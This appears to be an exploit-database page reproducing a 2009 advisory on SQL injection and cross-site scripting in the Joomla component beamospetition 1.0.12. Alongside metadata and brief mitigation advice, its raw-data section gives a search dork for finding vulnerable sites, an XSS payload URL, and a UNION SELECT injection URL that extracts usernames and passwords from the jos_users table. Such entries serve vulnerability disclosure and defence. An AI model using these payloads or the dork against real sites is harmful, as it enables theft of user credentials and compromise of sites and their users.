header-logo
Suggest Exploit
vendor:
beamospetition
by:
vds_s
7.5
CVSS
HIGH
SQL Injection / XSS
89, 79
CWE
Product Name: beamospetition
Affected Version From: 1.0.12
Affected Version To: 1.0.12
Patch Exists: YES
Related CWE: N/A
CPE: a:beamospetition:beamospetition:1.0.12
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Joomla component beamospetition 1.0.12 Sql Injection / Xss

The vulnerability exists due to insufficient sanitization of user-supplied input in the 'mpid' parameter of the 'func=sign' action of the 'com_beamospetition' component. A remote attacker can execute arbitrary SQL commands in the application database, cause XSS, access or modify data, exploit vulnerabilities in the underlying database and compromise the system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. Sanitize all user-supplied input to prevent SQL injection attacks.
Source

Exploit-DB raw data:

Joomla component beamospetition 1.0.12 Sql Injection / Xss

Author : vds_s

Dork : "Powered by beamospetition 1.0.12"

Dl : http://joomlacode.org/gf/project/beamospetition/

Xss : http://[site]/?option=com_beamospetition&func=sign&pet='><script>alert('Xss')</script>

Sql Injection : http://[site]/?option=com_beamospetition&func=sign&mpid=-9999'%20union%20select%200,1,username,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users/* 

# milw0rm.com [2009-01-21]

Navigation

Suggest Exploit

Services By CQR